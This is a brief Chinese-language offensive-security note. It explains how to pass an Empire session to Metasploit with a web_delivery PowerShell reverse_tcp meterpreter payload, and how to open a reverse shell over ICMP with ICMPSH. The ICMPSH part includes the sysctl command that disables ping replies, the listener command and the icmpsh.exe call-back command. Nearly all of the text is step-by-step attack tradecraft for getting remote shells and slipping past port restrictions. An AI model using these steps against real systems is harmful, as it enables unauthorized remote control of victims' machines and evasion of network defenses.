empire会话传递和代理

empire会话传递

  1. 获取session(特权用户传递会继承到特权)
  2. 进入msf模块: exploit/multi/script/web_delivery –> target: PSH –> paylaod: windows/meterpreter/reverse_tcp –> 监听
  3. 使用模块: code_execution/invoke_metasploitpayload –> 设置Agent, URL(根据msf生成的url去设置)
  4. 执行传递

端口转发和代理

Windows: mstsc

linux: rdesktop

ICMP

ICMPSH

需要在同网段下去做, 如果端口受到限制, 那我们就可以用ICMPSH这款工具去反弹shell

前提: ping未被禁用

依赖环境: python-impacket(python2版本的) pip2 install impacket

icmsh_m.py 源IP 目标IP

icmpsh.exe:

-t target –> 源IP

-d delay 500 –> 延迟的毫秒数

-s bytes 128 –> 缓冲区的大小

-b max blank 30 –> 最大的空白数

1
2
3
4
5
6
1. 现在kali设置ping代替应答
sysctl -w net.ipv4.icmp_echo_ignore_all=1 >/dev/null
2. 开启监听
icmpsh_m.py s_ip d_ip
3. 反弹shell
icmpsh.exe -t s_ip -d 500 -s 128 -b 30